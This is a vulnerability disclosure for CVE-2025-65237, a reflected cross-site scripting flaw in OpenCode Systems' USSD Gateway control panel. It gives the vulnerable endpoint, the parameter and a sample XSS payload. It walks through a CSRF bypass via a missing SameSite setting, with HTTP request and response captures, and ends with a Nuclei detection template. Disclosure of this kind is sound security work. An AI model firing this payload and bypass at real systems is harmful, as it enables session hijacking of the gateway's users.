[CVE-2025-65237] USSD Gateway Reflected Cross-Site Scripting

Technical information about the CVE-2025-65237 in OpenCode USSD GW application.

Description

Reflected Cross-Site Scripting in the USSD Gateway application offered by OpenCode Systems allows the user who has an access to the vulnerable function to execute JavaScript code against the victim. https://www.cve.org/CVERecord?id=CVE-2025-65237

Application Details

• Name: USSD Gateway

• Vendor: OpenCode Systems

• Version: OC Release 5 - Version 6.13.11

Technical Details

• Vulnerable Endpoint: /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a

• Vulnerable Parameter: flt_sessid

• Payload Sample: flt_sessid=6"><svg/onload=alert("poc%20XSS")>

Exploitation

This vulnerability is a chain of 2 vulnerabilities to convert self XSS to reflected XSS. The server assign cookies to the user after being logged in without specifying the SameSite value to Lax allowing the attacker to convert the request from GET to POST to bypass the CSRF verification parameter in the POST body.

The original request shows the vulnerable parameter in the POST body and contains CSRF verification parameter as well.

POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
[...]

_csrf=t_OoX[...]3D%3D&display=1&flt_sessid=6&flt_user=&flt_server_node=[...]

HTTP/2 200 OK
[...]
Content-Length: 22712
Content-Type: text/html; charset=utf-8


[...]
<TD align=right class=txt_small7 width=100><B>Session ID</B>:&nbsp;</td>
	<td class=txt_small7><input type=text name=flt_sessid class="txt frmtxt" value="6" size=10></td>
</tr>
<tr>
<TD align=right class=txt_small7 width=100><B>User ID</B>:&nbsp;</td>
[...]

An attempt was made to remove the CSRF verification parameter's value or delete the whole parameter because it's now self XSS and can't be shared with different users, but the server rejected the request as shown below

POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
[...]

_csrf=&display=1&flt_sessid=6&flt_user=&flt_server_node=[...]

HTTP/2 400 Bad Request
Content-Length: 18611
Content-Type: text/html; charset=utf-8
[...]

[...]
<div class="alert alert-danger" role="alert">
<h4>Error 400</h4>
<hr>
<h4 class="alert-heading">
Unable to verify your data submission.
</h4>
<p class="mb-0 error-description">
Unfortunately we're having trouble loading the page you are looking for. Please use the actions below.
</p>
</div>
[...]

It was noticed that the server is assigning the cookies to the user without adding Lax value for the SameSite parameter. This allows us to convert the request from POST to GET and remove the CSRF verification parameter to make a vulnerable URL can be shared with different users.

For more information about the SameSite types and bypasses, browse the following labs https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions

By Changing the request from POST to GET and remove the verification parameter's value for the CSRF or even the whole parameter and send it again, the server accepted the request and the vulnerable parameter's value is being reflected in the response.

GET /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&_csrf=&display=1&flt_sessid=6"><svg/onload=alert("poc%20XSS")>&flt_user=&flt_server_node=[...] HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
[...]

HTTP/2 200 OK
Content-Length: 22749
Content-Type: text/html; charset=utf-8
[...]


[...]
<td class=txt_small7><input type=text name=flt_sessid class="txt frmtxt" value="6"><svg/onload=alert(document.cookie)>" size=10></td>
[...]

Nuclei Template

You can use this template for an easy detection.

id: ocpanel-ussdgw-xss

info:
  name: USSD Gateway OCP Control Panel Reflected XSS
  author: Eslam Ali Akl @eslam3kl
  severity: Medium
  description: |
    Reflected XSS test for the OCP Control Panel USSD Gateway session listing.
    Injects a simple XSS payload into the flt_sessid parameter and flags
    the target if the payload is reflected unescaped in the HTML response.
  tags: [xss, reflected, ocpanel, ussdgw]

requests:
  - id: reflected_xss
    method: GET
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&_csrf=&display=1&flt_sessid=6%22%3E%3Csvg/onload=alert(document.cookie)%3E&flt_user=&flt_server_node="
    headers:
      User-Agent: "nuclei-scan"
      Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
      Cookie: "{{cookie}}"
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "<svg/onload=alert\\("
      - type: word
        words:
          - "alert(document.cookie)"